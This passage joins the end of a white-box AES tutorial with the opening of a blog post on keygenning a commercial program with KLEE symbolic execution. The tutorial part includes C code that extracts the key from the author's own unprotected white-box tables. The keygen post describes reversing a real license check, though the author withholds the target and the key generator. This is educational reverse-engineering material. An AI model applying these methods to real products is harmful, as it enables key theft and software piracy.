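    return w;
}

/* AddRoundKey + SubBytes + MixColumns on column j of a state that already
   went through ShiftRows, with a round key that went through it too. */
unsigned int tybox_column_sketch(const unsigned char state[16],
                                 const unsigned char shifted_key[16], size_t j)
{
    unsigned int w = 0;

    assert(state != NULL && shifted_key != NULL && j < 4);
    for (size_t n = 0; n < 4; ++n)
        w ^= tybox_entry_sketch(shifted_key[4 * j + n], 4 * j + n, state[4 * j + n]);
    return w;
}
```

With the key & plain-text of tests(), column 0 after ShiftRows is 32 5a 98 34 for the state and 2b ae 15 3c for the key ; the four lookups xored together give 0xe5816604, i.e. the bytes 04 66 81 e5. With a 4-byte unsigned int, the real Tyboxes[9][16][0x100] table weighs 147456 bytes.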

Final code

Yeah, finally, here we are ; the final code of our (not protected) AES128 white-box:

void aes128_enc_wb_final(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 4; ++j)
        {
            unsigned int aa = Tyboxes[i][j * 4 + 0][out[j * 4 + 0]];
            unsigned int bb = Tyboxes[i][j * 4 + 1][out[j * 4 + 1]];
            unsigned int cc = Tyboxes[i][j * 4 + 2][out[j * 4 + 2]];
            unsigned int dd = Tyboxes[i][j * 4 + 3][out[j * 4 + 3]];

            out[j * 4 + 0] = (Txor[Txor[(aa >>  0) & 0xf][(bb >>  0) & 0xf]][Txor[(cc >>  0) & 0xf][(dd >>  0) & 0xf]]) | ((Txor[Txor[(aa >>  4) & 0xf][(bb >>  4) & 0xf]][Txor[(cc >>  4) & 0xf][(dd >>  4) & 0xf]]) << 4);
            out[j * 4 + 1] = (Txor[Txor[(aa >>  8) & 0xf][(bb >>  8) & 0xf]][Txor[(cc >>  8) & 0xf][(dd >>  8) & 0xf]]) | ((Txor[Txor[(aa >> 12) & 0xf][(bb >> 12) & 0xf]][Txor[(cc >> 12) & 0xf][(dd >> 12) & 0xf]]) << 4);
            out[j * 4 + 2] = (Txor[Txor[(aa >> 16) & 0xf][(bb >> 16) & 0xf]][Txor[(cc >> 16) & 0xf][(dd >> 16) & 0xf]]) | ((Txor[Txor[(aa >> 20) & 0xf][(bb >> 20) & 0xf]][Txor[(cc >> 20) & 0xf][(dd >> 20) & 0xf]]) << 4);
            out[j * 4 + 3] = (Txor[Txor[(aa >> 24) & 0xf][(bb >> 24) & 0xf]][Txor[(cc >> 24) & 0xf][(dd >> 24) & 0xf]]) | ((Txor[Txor[(aa >> 28) & 0xf][(bb >> 28) & 0xf]][Txor[(cc >> 28) & 0xf][(dd >> 28) & 0xf]]) << 4);
        }
    }

    /// Last round which is a bit different
    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes_[j][out[j]];
        out[j] = x;
    }
}

It's cute isn't it?

Attacking the white-box: extract the key

As the title says, this white-box implementation is really insecure: if you have access to an executable embedding that kind of white-box, you just have to extract Tyboxes[0] & do a little magic to extract the key.

If it's not already obvious to you, you just have to remember how we actually compute the values inside those big tables ; look carefully at those two lines:

unsigned char c = S_box[x ^ round_keys[r][i]];
Tyboxes[r][i][x] = Ty[i % 4][c];

In our case, r is 0, i is the byte index inside round key 0 (which is the AES key) & we can also set x to a constant value: let's say 0 or 1 for instance. S_box is known, and so is Ty as this transformation is always the same (it doesn't depend on the key). Basically we just need to brute-force round_keys[r][i] with every value a byte can take. If the computed value is equal to the one in the dumped Tyboxes, then we have extracted one byte of the round key & we can go find the next one.

Attentive readers noticed that we are not going to actually extract the encryption key per se, but ShiftRows(key) instead (remember that we needed to apply this transformation to build our white-box). But again, since ShiftRows is not key-dependent we can invert this operation easily to really get the plain encryption key this time.

Here is the code that does what I just described:

unsigned char scrambled_key[16] = { 0 };
for (size_t i = 0; i < 16; ++i)
{
    // Tyboxes[0][i][1] was generated this way, k being the key byte we are after:
    //   unsigned char c = S_box[1 ^ k];
    //   Tyboxes[0][i][1] = Ty[i % 4][c];
    unsigned int value = Tyboxes_round0_dumped[i][1];
    // Now we generate the 0x100 possible values for that key byte & wait to find a match
    for (size_t j = 0; j < 0x100; ++j)
    {
        unsigned char c = S_box[1 ^ j];
        unsigned int computed_value = Ty[i % 4][c];
        if (computed_value == value)
            scrambled_key[i] = j;
    }
}

{
    unsigned char tmp1, tmp2;
    // 8-bits right rotation of the second line
    tmp1 = scrambled_key[13];
    scrambled_key[13] = scrambled_key[9];
    scrambled_key[9] = scrambled_key[5];
    scrambled_key[5] = scrambled_key[1];
    scrambled_key[1] = tmp1;

    // 16-bits right rotation of the third line
    tmp1 = scrambled_key[10];
    tmp2 = scrambled_key[14];
    scrambled_key[14] = scrambled_key[6];
    scrambled_key[10] = scrambled_key[2];
    scrambled_key[6] = tmp2;
    scrambled_key[2] = tmp1;

    // 24-bits right rotation of the last line
    tmp1 = scrambled_key[15];
    scrambled_key[15] = scrambled_key[3];
    scrambled_key[3] = scrambled_key[7];
    scrambled_key[7] = scrambled_key[11];
    scrambled_key[11] = tmp1;
}

printf("Key successfully extracted & UnShiftRow'd:\n");
for (size_t i = 0; i < 16; ++i)
    printf("\\x%.2x", scrambled_key[i]);
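
If you don't have a dumped table at hand, the whole attack can be simulated in one file. This is a sketch under assumptions: the "dump" is produced by the same formula as the generator (tybox_entry_sketch, a name of mine), sbox_entry rebuilds the S-box from its definition, and the inverse ShiftRows is written as a loop instead of the hand-made swaps.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Multiplication in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1. */
static unsigned char gf_mul(unsigned char a, unsigned char b)
{
    unsigned char r = 0;
    while (b) {
        if (b & 1)
            r ^= a;
        a = (unsigned char)((a << 1) ^ ((a & 0x80) ? 0x1b : 0x00));
        b >>= 1;
    }
    return r;
}

/* AES S-box entry: multiplicative inverse (0 maps to 0), then affine map. */
static unsigned char sbox_entry(unsigned char x)
{
    unsigned char inv = 0, s;
    for (unsigned int y = 1; y < 0x100; ++y)
        if (gf_mul(x, (unsigned char)y) == 1) {
            inv = (unsigned char)y;
            break;
        }
    s = inv;
    for (int k = 1; k <= 4; ++k)
        s ^= (unsigned char)((inv << k) | (inv >> (8 - k)));
    return (unsigned char)(s ^ 0x63);
}

/* Same value as Tyboxes[0][i][x] when k is byte i of ShiftRows(key). */
static unsigned int tybox_entry_sketch(unsigned char k, size_t i, unsigned char x)
{
    static const unsigned char m[16] = { 2, 3, 1, 1, 1, 2, 3, 1, 1, 1, 2, 3, 3, 1, 1, 2 };
    unsigned char c = sbox_entry((unsigned char)(x ^ k));
    unsigned int w = 0;
    for (size_t n = 0; n < 4; ++n)
        w |= (unsigned int)gf_mul(m[(i % 4) + 4 * n], c) << (8 * n);
    return w;
}

/* ShiftRows (inverse == 0) or its inverse ; row r is bytes r, r+4, r+8, r+12. */
static void shift_rows_sketch(unsigned char s[16], int inverse)
{
    unsigned char t[16];
    for (size_t r = 0; r < 4; ++r)
        for (size_t c = 0; c < 4; ++c) {
            size_t from = r + 4 * ((c + r) % 4), to = r + 4 * c;
            if (inverse)
                t[from] = s[to];
            else
                t[to] = s[from];
        }
    memcpy(s, t, 16);
}

/* Recovers `key` from a simulated dump of Tyboxes[0][i][1]. Returns 1 on success. */
int simulate_key_extraction(const unsigned char key[16])
{
    unsigned char shifted[16], recovered[16] = { 0 };

    assert(key != NULL);
    memcpy(shifted, key, 16);
    shift_rows_sketch(shifted, 0);

    for (size_t i = 0; i < 16; ++i) {
        /* What an attacker would read from the binary */
        unsigned int dumped = tybox_entry_sketch(shifted[i], i, 1);
        /* Brute-force the 0x100 candidates for this byte */
        for (unsigned int guess = 0; guess < 0x100; ++guess)
            if (tybox_entry_sketch((unsigned char)guess, i, 1) == dumped)
                recovered[i] = (unsigned char)guess;
    }

    shift_rows_sketch(recovered, 1);
    return memcmp(recovered, key, 16) == 0;
}
```

There is exactly one match per byte: each Ty table keeps an unmodified copy of its input in one of the four output bytes (the coefficient 1 of the matrix), so two different key bytes can't produce the same entry.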

Obfuscating it?

This is basically the part where you have no limits, where you can exercise your creativity & develop stuff. I'll just talk about ideas & obvious things, a lot of them are directly taken from @elvanderb's challenge so I guess I owe him yet another beer.

The first things you can do for free are:

  • Unrolling the implementation to make room for craziness
  • Use public LLVM passes on the unrolled implementation to make it even more crazy

The other good idea is to make the key elements of your implementation less obvious: basically the AES state, the tables & their structures. Those three things give away quite some important information about how your implementation works, so making it a bit harder to figure those points out is good for us. Instead of storing the AES state inside a contiguous memory area of 16 bytes, why not use 16 non-contiguous variables of 1 byte? You can go even further by using different variables for every round to make it even more confusing.

You can also apply that same idea to the different arrays our implementation uses: do not store them in a contiguous memory area, scatter them all over the memory & transform them into one-dimensional arrays instead.

We could also imagine a generic array "obfuscation" where you add several "layers" before reaching the value you are interested in:

  • Imagine an array [1,5,10,11] ; we could shuffle this one into [10, 5, 1, 11] and build the associated index table which would be [2, 1, 0, 3]
  • And now instead of accessing directly the first array, you retrieve the correct index first in the index table, shuffled[index[0]]
    • Obviously you could have as many indirections as you want
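
The indirection described in those bullets fits in a few lines. The first layer uses the exact arrays of the example ; the second layer (idx_shuffled & idx_index) is made up here just to show that the trick stacks.

```c
#include <assert.h>
#include <stddef.h>

/* Original array [1, 5, 10, 11], stored shuffled. */
static const unsigned char shuffled[4] = { 10, 5, 1, 11 };

/* index_table[i] is the position of original element i inside `shuffled`. */
static const unsigned char index_table[4] = { 2, 1, 0, 3 };

/* Hypothetical second layer: index_table itself stored shuffled, with
   idx_shuffled[idx_index[i]] == index_table[i]. */
static const unsigned char idx_shuffled[4] = { 3, 0, 1, 2 };
static const unsigned char idx_index[4] = { 3, 2, 1, 0 };

/* original[i] through one indirection */
unsigned char get_one_layer(size_t i)
{
    assert(i < 4);
    return shuffled[index_table[i]];
}

/* original[i] through two indirections */
unsigned char get_two_layers(size_t i)
{
    assert(i < 4);
    return shuffled[idx_shuffled[idx_index[i]]];
}
```

Both getters return 1, 5, 10 & 11 for i = 0..3 ; an analyst looking at the binary only sees lookups into tables that look unrelated.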

To make everything always more confusing, we could build the primitives we need on top of crazy CPU extensions like SSE or MMX; or completely build a virtual software-processor..!

Do also try to shuffle everything that is "shufflable" ; here is a simple graph that shows data-dependencies between the lines of our unrolled C implementation (an arrow from A to B means that A needs to be executed prior to B):

[Figure: aes.svg]

From here, you have everything you need to move the lines around & generate a "less normal" implementation (even though we can clearly see what I call synchronization points at the end of every round, which are basically the calls to ShiftRows(out) ; but again we could get rid of those by in-lining them directly, etc.):

def generate_shuffled_implementation_via_dependency_graph(dependency_graph, out_filename):
    '''This function is basically leveraging the graph we produced in the previous function
    to generate an actual shuffled implementation of the AES white-box without breaking any
    constraints, keeping the result of this new shuffled function the same as the clean version.'''
    lines = open('aes_unrolled_code.raw.clean.unique_aabbccdd', 'r').readlines()
    print ' > Finding the bottom of the graph..'
    last_nodes = set()
    for i in range(len(lines)):
        _, degree_o = dependency_graph.degree_iter(i, indeg = False, outdeg = True).next()
        if degree_o == 0:
            last_nodes.add(dependency_graph.get_node(i))

    assert(len(last_nodes) != 0)
    print ' > Good, check it out: %r' % last_nodes
    shuffled_lines = []
    step_n = 0
    print ' > Lets go'
    while len(last_nodes) != 0:
        print '  %.2d> Shuffle %d nodes / lines..' % (step_n, len(last_nodes))
        # Shuffle a real list: shuffling a temporary copy of the set would be lost
        level = list(last_nodes)
        random.shuffle(level)
        shuffled_lines.extend(lines[int(i.get_name())] for i in level)
        step_n += 1

        print '  %.2d> Finding parents / stepping back ..' % step_n
        tmp = set()
        for node in last_nodes:
            tmp.update(dependency_graph.in_neighbors(node))
        last_nodes = tmp
        step_n += 1

    shuffled_lines.reverse()  # in place, so the returned value is still a list
    with open(out_filename, 'w') as f:
        f.write('''void aes128_enc_wb_final_unrolled_shuffled_%d(unsigned char in[16], unsigned char out[16])
{
memcpy(out, in, 16);
''' % random.randint(0, 0xffffffff))
        f.writelines(shuffled_lines)
        f.write('}')
    return shuffled_lines

Anyway, I wish I had time to implement what we just talked about but I unfortunately don't; if you do, feel free to shoot me an email & I'll update the post with links to your code :-).

Last words

I hope this little post gave you enough to understand how white-box cryptography kind of works, how important the design of the implementation is and what sort of problems you can encounter. If you enjoyed this subject, here is a list of cool articles you may want to check out:

Every source file produced for this post has been posted on my github account right here: wbaes128.

Special thanks to my mate @__x86 for proof-reading!

Keygenning with KLEE

Introduction

In the past weeks I enjoyed working on reversing a piece of software (don't ask me the name), to study how serial numbers are validated. The story the user has to follow is pretty common: download the trial, pay, get the serial number, use it in the annoying nag screen to get the fully functional version of the software.

Since my purpose is not to damage the company developing the software, I will not mention the name of the software, nor will I publish the final key generator in binary form, nor its source code. My goal is instead to study a real case of serial number validation, and to highlight its weaknesses.

In this post we are going to take a look at the steps I followed to reverse the serial validation process and to make a key generator using KLEE symbolic virtual machine. We are not going to follow all the details on the reversing part, since you cannot reproduce them on your own. We will concentrate our thoughts on the key-generator itself: that is the most interesting part.

Getting acquainted

The software is an x86 executable, with no anti-debugging or anti-reversing techniques. When started it presents a nag screen asking for a registration composed of: customer number, serial number and a mail address. This is fairly common in software.

Tools of the trade

The first steps in the reversing are devoted to finding all the interesting functions to analyze. To do this I used IDA Pro with the Hex-Rays decompiler, and the WinDbg debugger. For the last part I used the KLEE symbolic virtual machine under Linux, the gcc compiler and some bash scripting. The actual key generator was a simple WPF application.

Let me skip the first part, since it is not very interesting. You can find many other articles on the web that can guide you through basic reversing techniques with IDA Pro. I only kept in mind some simple rules, while going forward:

  • always rename functions that use interesting data, even if you don't know precisely what they do. A name like license_validation_unknown_8 is always better than a default like sub_46fa39;
  • similarly, rename data whenever you find it interesting;
  • change data types when you are sure they are wrong: use structs and arrays in case of aggregates;
  • follow cross references of data and functions to expand your collection;
  • validate your beliefs with the debugger if possible. For example, if you think a variable contains the serial, break with the debugger and see if it is the case.

Big picture

When I collected the most interesting functions, I tried to understand the high level flow and the simpler functions. Here are the main variables and types used in the validation process. As a note for the reader: most of them have been purged of uninteresting details, for the sake of simplicity.

enum {
    ERROR,
    STANDARD,
    PRO
} license_type = ERROR;

Here we have a global variable providing the type of the license, used to enable and disable features of the application.

enum result_t {
    INVALID,
    VALID,
    VALID_IF_LAST_VERSION
};

This is a convenient enum used as a result for the validation. INVALID and VALID values are pretty self-explanatory. VALID_IF_LAST_VERSION tells that this registration is valid only if the current software version is the last available. The reasons for this strange possibility will be clear shortly.

#define HEADER_SIZE 8192
struct {
    int header[HEADER_SIZE];
    int data[1000000];
} mail_digest_table;

This is a data structure, containing digests of mail addresses of known registered users. This is a pretty big file embedded in the executable itself. During startup, a resource is extracted in a temporary file and its content copied into this struct. Each element of the header vector is an offset pointing inside the data vector.
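
To make the header/data relationship concrete, here is a minimal sketch of such a lookup. The tiny table sizes, the digest values and the name digest_matches are all made up for illustration. The three-slot window mirrors the loop in the registration check, but the real layout of the embedded resource may well differ.

```c
#include <assert.h>
#include <stddef.h>

#define DEMO_HEADER_SIZE 4   /* hypothetical; the real header has 8192 entries */
#define DEMO_DATA_SIZE   8   /* hypothetical; the real data vector is far larger */

/* Toy stand-in for mail_digest_table: header[i] is an offset into data. */
static const int demo_header[DEMO_HEADER_SIZE] = { 0, 3, 5, 5 };
static const int demo_data[DEMO_DATA_SIZE] = { 11, 22, 33, 44, 55, 66, 77, 88 };

/* Return 1 if digest appears in the three slots that start at the offset
 * stored in demo_header[index], 0 otherwise. */
int digest_matches(size_t index, int digest) {
    assert(index < DEMO_HEADER_SIZE);
    size_t offset = (size_t)demo_header[index];
    for (size_t i = 0; i < 3 && offset + i < DEMO_DATA_SIZE; ++i) {
        if (demo_data[offset + i] == digest)
            return 1;
    }
    return 0;
}
```

With this toy table, digest_matches(1, 44) succeeds because header entry 1 points at offset 3, where the window holds 44, 55 and 66.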

Here we have a pseudo-C code for the registration check, that uses data types and variables explained above:

enum result_t check_registration(int serial, int customer_num, const char* mail) {
    // validate serial number
    license_type = get_license_type(serial);
    if (license_type == ERROR)
        return INVALID;

    // validate customer number
    int expected_customer = compute_customer_number(serial, mail);
    if (expected_customer != customer_num)
        return INVALID;

    // validate w.r.t. known registrations
    int index = get_index_in_mail_table(serial);
    if (index > HEADER_SIZE)
        return VALID_IF_LAST_VERSION;
    int mail_digest = compute_mail_digest(mail);
    for (int i = 0; i < 3; ++i) {
        if (mail_digest_table[index + i] == mail_digest)
            return VALID;
    }
    return INVALID;
}

The validation is divided in three main parts:

  • serial number must be valid by itself;
  • serial number, combined with mail address has to correspond to the actual customer number;
  • there has to be a correspondence between serial number and mail address, stored in a static table in the binary.

The last point is a little bit unusual. Let me restate it in this way: whenever a customer buys the software, the customer table gets updated with their data and becomes available in the next version of the software (because it is embedded in the binary and not downloaded through the internet). This explains the VALID_IF_LAST_VERSION check: if you buy the software today, the current version does not contain your data. You are still allowed to get a "pro" version until a new version is released. At that moment you are forced to update to that new version, so the software can verify your registration with the updated table. Here is a pseudo-code of that check:

switch (check_registration(serial, customer, mail)) {
case VALID:
    // the registration is OK! activate functionalities
    activate_pro_functionality();
    break;
case VALID_IF_LAST_VERSION:
    {
        // check if the current version is the last, by
        // using the internet.
        int current_version = get_current_version();
        int last_version = get_last_version();
        if (current_version == last_version)
            // OK for now: a new version is not available
            activate_pro_functionality();
        else
            // else, force the user to download the new version
            // before proceeding
            ask_download();
    }
    break;
case INVALID:
    // registration is not valid
    handle_invalid_registration();
    break;
}

The version check is done by making an HTTP request to a specific page that returns a page having only the last version number of the software. Don't ask me why the protection is not completely server side but involves static tables, version checks and things like that. I don't know!

Anyway, this is the big picture of the registration validation functions, and this is pretty boring. Let's move on to the interesting part. You may notice that I provided code for the main procedure, but not for the helper functions like get_license_type, compute_customer_number, and so on. This is because I did not have to reverse them. They contain a lot of arithmetical and logical operations on registration data, and they are very difficult to understand. The good news is that we do not have to understand them, we need only to reverse them!

Symbolic execution

Symbolic execution is a way to execute programs using symbolic variables instead of concrete values. A symbolic variable is used whenever a value can be controlled by user input (this can be done by hand or determined by using taint analysis), and could be a file, standard input, a network stream, etc. Symbolic execution translates the program's semantics into a logical formula. Each instruction causes that formula to be updated. By solving the formula for one path, we get concrete values for the variables. If those values are used as input to the program, the execution reaches that program point. Dynamic Symbolic Execution (DSE) builds the logical formula at runtime, step-by-step, following one path at a time. When a branch of the program is found during the execution, the engine transforms the condition into arithmetic operations. It then chooses the T (true) or F (false) branch and updates the formula with this new constraint (or its negation). At the end of a path, the engine can backtrack and select another path to execute. For example:

int v1 = SymVar_1, v2 = SymVar_2; // symbolic variables
if (v1 > 0)
    v2 = 0;
if (v2 == 0 && v1 <= 0)
    error();

We want to check if error is reachable, by using symbolic variables SymVar_1 and SymVar_2, assigned to the program's variables v1 and v2. In line 2 we have the condition v1 > 0, so the symbolic engine adds the constraint SymVar_1 > 0 for the true branch or, conversely, SymVar_1 <= 0 for the false branch. It then continues the execution with the first constraint. Whenever a new branch is reached, new constraints are added to the symbolic state, until the path condition is no longer satisfiable. In that case, the engine backtracks and replaces some constraints with their negation, in order to reach other code paths. The execution engine tries to cover all code paths by solving those constraints and their negations. For each portion of the code reached, the symbolic engine outputs a test case covering that part of the program, providing concrete values for the input variables. In this particular example, the engine continues the execution and finds the condition v2 == 0 && v1 <= 0 at line 4. Since v2 has just been set to 0 on this path, the path formula for the true branch becomes SymVar_1 > 0 && (0 == 0 && SymVar_1 <= 0), which is not satisfiable. The symbolic engine then provides values that satisfy the remaining formula (SymVar_1 > 0), for example SymVar_1 = 1 and any value for SymVar_2. The engine then backtracks to the previous branch and uses the negation of the constraint, that is SymVar_1 <= 0. On this path v2 is still symbolic, so at line 4 the true branch gives SymVar_1 <= 0 && (SymVar_2 == 0 && SymVar_1 <= 0). This is satisfiable with SymVar_1 = -1 and SymVar_2 = 0, and it reaches error. The false branch, SymVar_1 <= 0 && (SymVar_2 != 0 || SymVar_1 > 0), is satisfiable too, for example with SymVar_1 = -1 and SymVar_2 = 1. This concludes the analysis of the program paths, and our symbolic execution engine can output the following test cases:

  • v1 = 1;
  • v1 = -1, v2 = 0;
  • v1 = -1, v2 = 1.

Those test cases are enough to cover all the paths of the program.
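
A quick way to convince yourself is to replay concrete inputs on the same control flow. The sketch below is not something a symbolic engine produces: the names reaches_error and replay_test_cases are mine, error() is replaced by a return value so the outcome can be observed, and the inputs are picked by hand, one per feasible path.

```c
#include <assert.h>

/* Same control flow as the snippet above; returns 1 where error() would be
 * called and 0 otherwise. */
int reaches_error(int v1, int v2) {
    if (v1 > 0)
        v2 = 0;
    if (v2 == 0 && v1 <= 0)
        return 1;
    return 0;
}

/* Replay one hand-picked input per feasible path. */
void replay_test_cases(void) {
    assert(reaches_error(1, 5) == 0);   /* v1 > 0: v2 is overwritten, no error */
    assert(reaches_error(-1, 0) == 1);  /* v1 <= 0 and v2 == 0: error reached  */
    assert(reaches_error(-1, 1) == 0);  /* v1 <= 0 and v2 != 0: no error       */
}
```

The value 5 in the first call is arbitrary, since v2 is overwritten on that path.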

This approach is useful for testing because it helps generate test cases. It is often effective, and it does not waste computational power of your brain. You know... tests are very difficult to do effectively, and brain power is such a scarce resource!

I don't want to elaborate too much on this topic because it is way too big to fit in this post. Moreover, we are not going to use symbolic execution engines for testing purpose. This is just because we don't like to use things in the way they are intended :)

However, I will point you to some good references in the last section. Here I can list a series of common strengths and weaknesses of symbolic execution, just to give you a little bit of background:

Strengths:

  • when a test case fails, the program is proven to be incorrect;
  • automatic test cases catch errors that are often overlooked in manually written test cases (this is from the KLEE paper);
  • when it works it's cool :) (and this is from Jérémy);

Weaknesses:

  • when no tests fail we are not sure everything is correct, because no proof of correctness is given; static analysis can do that when it works (and often it does not!);
  • covering all the paths is not enough, because a variable can hold different values in one path and only some of them cause a bug;
  • complete coverage for non trivial programs is often impossible, due to path explosion or constraint solver timeout;
  • scaling is difficult, and execution time of the engine can suffer;
  • undefined behavior of CPU could lead to unexpected results;
  • ... and maybe there are a lot more remarks to add.

KLEE

KLEE is a great example of a symbolic execution engine. It operates on LLVM byte code, and it is used for software verification purposes. KLEE is capable of automatically generating test cases that achieve high code coverage. KLEE is also able to find memory errors such as out-of-bounds array accesses and many other common errors. To do that, it needs an LLVM byte code version of the program, symbolic variables and (optionally) assertions. I have also prepared a Docker image with clang and klee already configured and ready to use. So, you have no excuse not to try it out! Take this example function:

#define FALSE 0
#define TRUE 1
typedef int BOOL;

BOOL check_arg(int a) {
    if (a > 10)
        return FALSE;
    else if (a <= 10)
        return TRUE;
    return FALSE; // not reachable
}

This is actually a silly example, I know, but let's pretend to verify this function with this main:

#include <assert.h>
#include <klee/klee.h>

int main() {
    int input;
    klee_make_symbolic(&input, sizeof(int), "input");
    return check_arg(input);
}

In main we have a symbolic variable used as input for the function to be tested. We can also modify it to include an assertion:

BOOL check_arg(int a) {
    if (a > 10)
        return FALSE;
    else if (a <= 10)
        return TRUE;
    klee_assert(FALSE);
    return FALSE; // not reachable
}

We can now use clang to compile the program to the LLVM byte code and run the test generation with the klee command:

clang -emit-llvm -g -o test.ll -c test.c
klee test.ll

We get this output:

KLEE: output directory is "/work/klee-out-0"

KLEE: done: total instructions = 26
KLEE: done: completed paths = 2
KLEE: done: generated tests = 2

KLEE will generate test cases for the input variable, trying to cover all the possible execution paths and to make the provided assertions fail (if any are given). In this case we have two execution paths and two generated test cases covering them. Test cases are in the output directory (in this case /work/klee-out-0). The soft link klee-last is also provided for convenience, pointing to the last output directory. Inside that directory a bunch of files were created, including the two test cases named test000001.ktest and test000002.ktest. These are binary files, which can be examined with the ktest-tool utility. Let's try it:

$ ktest-tool --write-ints klee-last/test000001.ktest 
ktest file : 'klee-last/test000001.ktest'
args       : ['test.ll']
num objects: 1
object    0: name: 'input'
object    0: size: 4
object    0: data: 2147483647

And the second one:

$ ktest-tool --write-ints klee-last/test000002.ktest 
...
object    0: data: 0

In these test files, KLEE reports the command line arguments, the symbolic objects along with their size and the value provided for the test. To cover the whole program, we need the input variable to take one value greater than 10 and one less than or equal to 10. You can see that this is the case: in the first test case the value 2147483647 is used, covering the first branch, while 0 is provided for the second, covering the other branch.

So far, so good. But what if we change the function in this way?

BOOL check_arg(int a) {
    if (a > 10)
        return FALSE;
    else if (a < 10)    // instead of <=
        return TRUE;
    klee_assert(FALSE);
    return FALSE;       // now reachable
}

We get this output:

$ klee test.ll 
KLEE: output directory is "/work/klee-out-2"
KLEE: ERROR: /work/test.c:9: ASSERTION FAIL: 0
KLEE: NOTE: now ignoring this error at this location

KLEE: done: total instructions = 27
KLEE: done: completed paths = 3
KLEE: done: generated tests = 3

And this is the klee-last directory contents:

$ ls klee-last/
assembly.ll   run.istats        test000002.assert.err  test000003.ktest
info          run.stats         test000002.ktest       warnings.txt
messages.txt  test000001.ktest  test000002.pc

Note the test000002.assert.err file. If we examine its corresponding test file, we have:

$ ktest-tool --write-ints klee-last/test000002.ktest 
ktest file : 'klee-last/test000002.ktest'
...
object    0: data: 10

As expected, the assertion fails when the input value is 10. So, as we now have three execution paths, we also have three test cases, and the whole program gets covered. KLEE also provides the possibility to replay the tests with the real program, but we are not interested in it now. You can see a usage example in this KLEE tutorial.
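
To see the gap without KLEE, the three reported values can be replayed by hand. This is only an illustrative sketch: the enum and the name classify_arg are mine, and the klee_assert is replaced by a distinct return value so the fall-through case is visible.

```c
/* Possible outcomes of the modified check_arg; FELL_THROUGH marks the spot
 * where the klee_assert(FALSE) sits in the original. */
enum outcome { REJECTED = 0, ACCEPTED = 1, FELL_THROUGH = -1 };

/* Same branches as the modified check_arg (a < 10 instead of a <= 10). */
enum outcome classify_arg(int a) {
    if (a > 10)
        return REJECTED;
    else if (a < 10)
        return ACCEPTED;
    return FELL_THROUGH;   /* only a == 10 gets here */
}
```

Calling classify_arg with 2147483647, 0 and 10 exercises one path each, and 10 is the only input that falls between the two tests.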

KLEE's ability to find execution paths of an application is very good. According to the OSDI 2008 paper, KLEE has been successfully used to test all 89 stand-alone programs in GNU COREUTILS and the equivalent busybox port, finding previously undiscovered bugs, errors and inconsistencies. The achieved code coverage was more than 90% per tool. Pretty awesome!

But, you may ask: "The question is, who cares?" You will see in a moment.

KLEE to reverse a function

As we have a powerful tool to find execution paths, we can use it to find the path we are interested in. As shown by the nice symbolic maze post of Feliam, we can use KLEE to solve a maze. The idea is simple but very powerful: flag the portion of code you are interested in with a klee_assert(0) call, causing KLEE to highlight the test case able to reach that point. In the maze example, this is as simple as replacing a read call with a klee_make_symbolic and the printf("You win!\n") with the already mentioned klee_assert(0). Test cases triggering this assertion are the ones solving the maze!

For a concrete example, let's suppose we have this function:

int magic_computation(int input) {
    for (int i = 0; i < 32; ++i)
        input ^= 1 << i;
    return input;
}

And we want to know for what input we get the output 253. A main that tests this could be:

int main(int argc, char* argv[]) {
    int input = atoi(argv[1]);
    int output = magic_computation(input);
    if (output == 253)
        printf("You win!\n");
    else
        printf("You lose\n");
    return 0;
}

KLEE can solve this problem for us, if we provide symbolic inputs and an assert to trigger:

int main(int argc, char* argv[]) {
    int input, result;
    klee_make_symbolic(&input, sizeof(int), "input");
    result = magic_computation(input);
    if (result == 253)
        klee_assert(0);
    return 0;
}

Run KLEE and print the result:

$ clang -emit-llvm -g -o magic.ll -c magic.c
$ klee magic.ll
$ ktest-tool --write-ints klee-last/test000001.ktest
ktest file : 'klee-last/test000001.ktest'
args       : ['magic.ll']
num objects: 1
object    0: name: 'input'
object    0: size: 4
object    0: data: -254

The answer is -254. Let's test it:

$ gcc magic.c
$ ./a.out -254
You win!

Yes!
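
In this toy case the answer can also be checked by hand: the loop flips each of the 32 bits exactly once, so the whole function is a bitwise NOT and is its own inverse. Here is a small sketch of that observation. The names flip_all_bits and invert_magic are mine, and I use uint32_t so that shifting into the top bit is well defined.

```c
#include <stdint.h>

/* Same bit-flipping loop as magic_computation, on an unsigned 32-bit type. */
uint32_t flip_all_bits(uint32_t input) {
    for (int i = 0; i < 32; ++i)
        input ^= UINT32_C(1) << i;
    return input;
}

/* Flipping every bit is a bitwise NOT, so applying NOT again inverts it. */
uint32_t invert_magic(uint32_t output) {
    return (uint32_t)~output;
}
```

Here invert_magic(253) yields 0xFFFFFF02, which is -254 when read as a 32-bit two's complement integer, matching the value KLEE reported.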

KLEE, libc and command line arguments

Not all functions are so simple. At the very least, we could have calls to the C standard library such as strlen, atoi, and the like. We cannot link our test code with the system's C library, as it is not inspectable by KLEE. For example:

int main(int argc, char* argv[]) {
    int input = atoi(argv[1]);
    return input;
}

If we run it with KLEE we get this error:

$ clang -emit-llvm -g -o atoi.ll -c atoi.c
$ klee atoi.ll 
KLEE: output directory is "/work/klee-out-4"
KLEE: WARNING: undefined reference to function: atoi
KLEE: WARNING ONCE: calling external: atoi(0)
KLEE: ERROR: /work/atoi.c:5: failed external call: atoi
KLEE: NOTE: now ignoring this error at this location
...

To fix this we can use the KLEE uClibc and POSIX runtime. Taken from the help:

"If we were running a normal native application, it would have been linked with the C library, but in this case KLEE is running the LLVM bitcode file directly. In order for KLEE to work effectively, it needs to have definitions for all the external functions the program may call. Similarly, a native application would be running on top of an operating system that provides lower level facilities like write(), which the C library uses in its implementation. As before, KLEE needs definitions for these functions in order to fully understand the program. We provide a POSIX runtime which is designed to work with KLEE and the uClibc library to provide the majority of operating system facilities used by command line applications".

Let's try to use these facilities to test our atoi function:

$ klee --optimize --libc=uclibc --posix-runtime atoi.ll --sym-args 0 1 3
KLEE: NOTE: Using klee-uclibc : /usr/local/lib/klee/runtime/klee-uclibc.bca
KLEE: NOTE: Using model: /usr/local/lib/klee/runtime/libkleeRuntimePOSIX.bca
KLEE: output directory is "/work/klee-out-5"
KLEE: WARNING ONCE: calling external: syscall(16, 0, 21505, 70495424)
